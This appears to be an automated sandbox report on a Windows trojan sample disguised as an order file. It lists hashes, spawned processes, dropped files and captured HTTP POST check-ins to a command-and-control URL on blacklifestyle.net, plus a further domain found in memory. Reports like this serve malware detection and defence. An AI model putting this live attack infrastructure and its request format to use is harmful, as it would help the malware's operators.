- 24576:Fdcm7EwVeP6YCXPtOHwZtt9oSO9y4INOOSl+Ztt9oSO9yrSR2:FdcmN/FHtO9y2+HtO9yD
- imphash
- e4d769b6bf60944eec2e858a8542b519
- authentihash
- dec6270739ef0ed207b7c981d3f4b0f401150b72d44e83d7c5606fc094f8c70b
- Compiler/Packer
- Borland Delphi 4.0
Classification (TrID)
- 35.5% (.EXE) Win32 Executable Delphi generic
- 32.8% (.SCR) Windows screen saver
- 11.2% (.EXE) Win32 Executable (generic)
- 5.1% (.EXE) Win16/32 Executable Delphi generic
- 5.0% (.EXE) OS/2 Executable (generic)
File Sections
Details | ||||||
---|---|---|---|---|---|---|
File Resources
Details | ||||
---|---|---|---|---|
File Imports
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 3 processes in total.
-
OURORDERNOHSCLGD-140526.exe
(PID: 3896)
45/73
-
TVcard.exe
(PID: 4500)
29/73
- TVcard.exe (PID: 4484) 29/73
-
TVcard.exe
(PID: 4500)
29/73
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
blacklifestyle.net
OSINT |
47.254.173.224
TTL: 599 |
Hostinger, UAB
Organization: King Kendrick Kendrick Name Server: A.DNSPOD.COM Creation Date: Thu, 21 Mar 2019 23:39:25 GMT |
United States |
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
47.254.173.224:80 (blacklifestyle.net) | POST | blacklifestyle.net/sliver/power/energy/fre.php | POST /sliver/power/energy/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blacklifestyle.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A94C4A2C
Content-Length: 192
Connection: close More Details |
47.254.173.224:80 (blacklifestyle.net) | POST | blacklifestyle.net/sliver/power/energy/fre.php | POST /sliver/power/energy/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blacklifestyle.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A94C4A2C
Content-Length: 192
Connection: close More Details |
47.254.173.224:80 (blacklifestyle.net) | POST | blacklifestyle.net/sliver/power/energy/fre.php | POST /sliver/power/energy/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blacklifestyle.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A94C4A2C
Content-Length: 192
Connection: close More Details |
47.254.173.224:80 (blacklifestyle.net) | POST | blacklifestyle.net/sliver/power/energy/fre.php | POST /sliver/power/energy/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blacklifestyle.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A94C4A2C
Content-Length: 165
Connection: close More Details |
47.254.173.224:80 (blacklifestyle.net) | POST | blacklifestyle.net/sliver/power/energy/fre.php | POST /sliver/power/energy/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blacklifestyle.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A94C4A2C
Content-Length: 165
Connection: close More Details |
Memory Forensics
String | Context | Stream UID |
---|---|---|
ckav.ru | Domain/IP reference | 00017421-00004484-17710-112-00414325 |
http://blacklifestyle.net/sliver/power/energy/fre.php | Domain/IP reference | 00017421-00004484-17710-56-004036F2 |
9bis.com | Domain/IP reference | 00017421-00004484-17710-422-0040F775 |
mozilla.org | Domain/IP reference | 00017421-00004484-17710-375-00409A77 |
Extracted Strings
Extracted Files
-
Malicious 1
-
-
TVcard.exe
- Size
- 90KiB (92160 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Trojan.Generic" (29/73)
- Runtime Process
- OURORDERNOHSCLGD-140526.exe (PID: 3896)
- MD5
- 50313e466a38e41be62ecf188e103673
- SHA1
- d60d3bc51006f03e5440c6152638ef16e8c4ef7a
- SHA256
- 1b44acfc7e6b0d0cf553273a8e46e1f49c8e3e0a449e36ab61dfad8e9c954c47
-
-
Informative 2
-
-
c6e53759ff54727c35ea84c1a56f8b1f_733c94c5-cebb-4f98-a75f-22a797d1d50b
- Size
- 48B (48 bytes)
- Type
- data
- Runtime Process
- TVcard.exe (PID: 4484)
- MD5
- 8f268cb2234a577288e7810ec660471c
- SHA1
- ee22525b09e0fd1e7f0f8bb864c99db9646e2ef1
- SHA256
- 4c318d03f2f4d8adeea736b890df3bcbc30b52360c81779bff3a17a3429f99e7
-
F.bmp
- Size
- 432KiB (442050 bytes)
- Type
- unknown
- Description
- PC bitmap, Windows 3.x format, 178 x 261 x 24
- Runtime Process
- OURORDERNOHSCLGD-140526.exe (PID: 3896)
- MD5
- 8956ceb7884070c9cbf2583337426143
- SHA1
- c7de4b950dcd123f956fe057a92936f96209f6d4
- SHA256
- e0f8a7d7c232f0273108e7751036351f2b8682e4965504402733bd9081542a5b
-
Notifications
-
Runtime
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Network whitenoise filtering was applied
- Not all sources for indicator ID "string-24" are available in the report
- Not all sources for indicator ID "string-64" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)